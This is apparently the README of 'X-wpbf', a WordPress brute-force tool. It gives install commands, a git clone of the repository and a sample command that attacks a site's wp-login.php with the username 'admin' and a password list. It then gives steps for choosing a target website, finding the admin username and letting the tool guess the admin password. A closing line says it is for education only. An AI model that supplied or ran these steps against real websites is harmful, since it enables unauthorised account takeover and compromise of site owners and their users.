X-wpbf is a wordpress bruteforce tool to find admin or user passwords via the admin login of the target website
$ pkg update -y && pkg upgrade -y
$ apt update -y && apt upgrade -y
$ pkg install git
$ pkg install python -y
$ git clone https://github.com/Whomrx666/X-wpbf.git
$ cd X-wpbf
$ python2 X-wpbf.py
$ python2 X-wpbf.py -h https://test.com/wp-login.php -u admin -P password.txt
- pw1.txt
- pw2.txt
- wordlist.txt
- first: Install tools according to the instructions above
- second: Determine the target website and look for the username from the admin
- third: Enter the command according to the example given
- last: The tool will automatically look for the password from the website admin login
This is a tool for education only, I am not responsible for any misuse